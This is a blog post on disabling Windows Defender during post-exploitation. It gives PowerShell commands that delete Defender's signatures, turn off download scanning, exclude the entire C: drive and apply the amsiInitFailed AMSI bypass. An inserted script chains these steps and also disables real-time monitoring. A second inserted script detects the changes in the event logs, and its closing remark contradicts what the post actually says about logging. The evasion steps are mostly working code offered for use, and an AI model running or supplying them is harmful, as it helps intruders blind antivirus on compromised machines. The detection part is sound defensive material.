
Bypassing Windows Defender On Post-Exploitation

So you were able to exploit a Windows box, but now you have to deal with Windows Defender on that system. Before you can load your tools for further post-exploitation, Defender must be dealt with. Here are three simple commands that strip its signatures and turn off download scanning, reduce the chance of it doing any useful scanning if it starts back up, and stop the Windows Antimalware Scan Interface (AMSI) from flagging malicious script payloads. All three assume an elevated (administrator) PowerShell session on the target.

1. Delete the current signature set and disable scanning of downloaded files and attachments

& "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Set-MpPreference -DisableIOAVProtection $true

The leading & is what PowerShell needs to run a quoted path; from a cmd.exe prompt run the first line without it. Note that -DisableIOAVProtection only switches off scanning of downloads and attachments, not on-access (real-time) scanning, and Defender will pull a fresh signature set at its next update.

2. Exclude the C: drive so that everything on it is skipped if Defender starts scanning again.

Add-MpPreference -ExclusionPath "C:\"

3. Bypass Windows AMSI so that script content run in this PowerShell process is no longer scanned. The patch applies to the current process only; a new PowerShell process starts with AMSI active again.

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic, Static').SetValue($null, $true)
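Putting the three steps together, as an added example that is not part of the original post: a PowerShell script that snapshots the Defender settings each step touches, runs the steps, and prints a before/after table so the operator can see which changes actually took. It goes one step beyond the post by also flipping real-time monitoring, since -DisableIOAVProtection on its own only stops scanning of downloads and attachments. Assumed here: an elevated session on a host with the Defender PowerShell module (Get-MpComputerStatus, Set-MpPreference), Tamper Protection off, and MpCmdRun.exe at its default path. Later Defender signatures flag the amsiInitFailed one-liner itself, so on an up-to-date host the script is blocked when loaded unless step 1 has already succeeded.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the original post. Runs the three steps as one
# script and snapshots Defender state before and after so the operator can see
# which changes actually took. Assumptions (labelled): the Defender module is
# present, Tamper Protection is off, and MpCmdRun.exe is at its default path.
# With Tamper Protection on, Set-MpPreference/Add-MpPreference are rejected and
# the After column matches Before for everything except the AMSI field.

$MpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'

function Get-DefenderState {
    # Snapshot of exactly the settings the three steps touch
    $status    = Get-MpComputerStatus
    $pref      = Get-MpPreference
    $amsiType  = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
    $amsiField = $amsiType.GetField('amsiInitFailed', 'NonPublic,Static')
    [pscustomobject]@{
        TamperProtected    = $status.IsTamperProtected
        RealTimeProtection = $status.RealTimeProtectionEnabled
        IOAVProtection     = -not $pref.DisableIOAVProtection
        SignatureVersion   = $status.AntivirusSignatureVersion
        ExclusionPaths     = (@($pref.ExclusionPath) -join ';')
        AmsiInitFailed     = $amsiField.GetValue($null)   # $true once step 3 has run in this process
    }
}

function Compare-DefenderState {
    param($Before, $After)
    # One row per setting so the diff is obvious at a glance
    foreach ($name in $Before.PSObject.Properties.Name) {
        [pscustomobject]@{
            Setting = $name
            Before  = $Before.$name
            After   = $After.$name
            Changed = ($Before.$name -ne $After.$name)
        }
    }
}

$before = Get-DefenderState
if ($before.TamperProtected) {
    Write-Warning 'Tamper Protection is on: steps 1 and 2 will be rejected by Defender.'
}

# Step 1: drop the signature set, then stop scanning of downloads/attachments.
# -DisableIOAVProtection does not stop on-access scanning; the extra
# -DisableRealtimeMonitoring line (not in the post) is the switch most people
# mean by "disable Defender", and is equally blocked by Tamper Protection.
& $MpCmdRun -RemoveDefinitions -All | Out-Null
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true

# Step 2: exclude the whole system drive so a re-enabled engine skips it
Add-MpPreference -ExclusionPath "$env:SystemDrive\"

# Step 3: AMSI bypass, effective only inside this PowerShell process
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)

$after = Get-DefenderState
Compare-DefenderState -Before $before -After $after | Format-Table -AutoSize | Out-Host
```

The Changed column is the check worth reading: a row that stays False after the script ran (typically TamperProtected is True and nothing else moved) tells you the change was rejected rather than silently applied.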

Now you should have free rein to continue post-exploitation without Defender flagging the tools you bring in. Two caveats: each of these changes is written to the local Defender and PowerShell event logs, so a host that forwards those logs will show exactly what was done, and on current Windows builds Tamper Protection blocks steps 1 and 2 unless it has been turned off first. Even so, given how little stands in the way of disabling Defender once admin credentials have been obtained, it is a good idea to consider a different AV to defend your network.
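The administrator-side view of the same three steps, as an added example that is not part of the original post: a script that pulls the Defender configuration-change events and any PowerShell script blocks containing the reflection-based AMSI bypass out of the local event logs. Assumed here: the standard log names and event IDs of Windows 10 / Server 2016 and later, script block logging enabled for the 4104 part, and a hypothetical lookback window $Hours introduced for this script.

```powershell
# Added example, not part of the original post: the administrator-side check for
# the three changes above. Defender writes every configuration change to its
# local Operational event log whether or not anything forwards it, and with
# PowerShell script block logging on, the AMSI bypass text is recorded verbatim.
# Assumptions (labelled): log names and event IDs are the standard Windows 10 /
# Server 2016+ ones; $Hours is a hypothetical lookback window for this script.

param([int]$Hours = 24)

function Get-DefenderConfigChanges {
    param([datetime]$Since)
    # 5001 real-time protection disabled, 5004 real-time configuration changed,
    # 5007 platform configuration changed (exclusions are reported here),
    # 5013 Tamper Protection blocked a change
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5007, 5013
        StartTime = $Since
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = $_.Message -replace '\s+', ' '
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Id      = $_.Id
            # keyword match on the event text for the settings the post changes;
            # the event ID filter above is the reliable part, this is a convenience
            Touches = (([regex]::Matches($text, 'Exclusions|DisableIOAVProtection|DisableRealtimeMonitoring') |
                        ForEach-Object Value | Select-Object -Unique) -join ',')
            Message = $text.Substring(0, [Math]::Min(120, $text.Length))
        }
    }
}

function Get-AmsiBypassScriptBlocks {
    param([datetime]$Since)
    # 4104 = script block logged; match the reflection-based AMSI bypass
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    }
    $pattern = 'AmsiUtils|amsiInitFailed|AmsiScanBuffer'
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $m = [regex]::Match($_.Message, $pattern)
        if ($m.Success) {
            $text = $_.Message -replace '\s+', ' '
            [pscustomobject]@{
                Time  = $_.TimeCreated
                Match = $m.Value
                Text  = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

$since = (Get-Date).AddHours(-$Hours)
Write-Host "Defender configuration events since $since"
Get-DefenderConfigChanges -Since $since | Format-Table -AutoSize | Out-Host
Write-Host "Script blocks matching AMSI bypass patterns since $since"
Get-AmsiBypassScriptBlocks -Since $since | Format-Table -AutoSize -Wrap | Out-Host
```

Because this script itself contains the pattern it searches for, expect one 4104 hit for its own script block when script block logging is on; anything else in that list, and any 5007 row whose Touches column names Exclusions or DisableIOAVProtection, is the trail the post claims is not there.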

Michael has been a professional in the information technology field for over 10 years, specializing in software engineering and systems administration. He studied network security and holds a software engineering degree from Milwaukee Area Technical College, with thousands of hours of self-taught learning as well. He mainly writes about technology, current events, and coding. Michael is also the founder of Sof Digital, a U.S.-based software development firm. His hobbies are archery, turntablism, disc golf and rally racing.
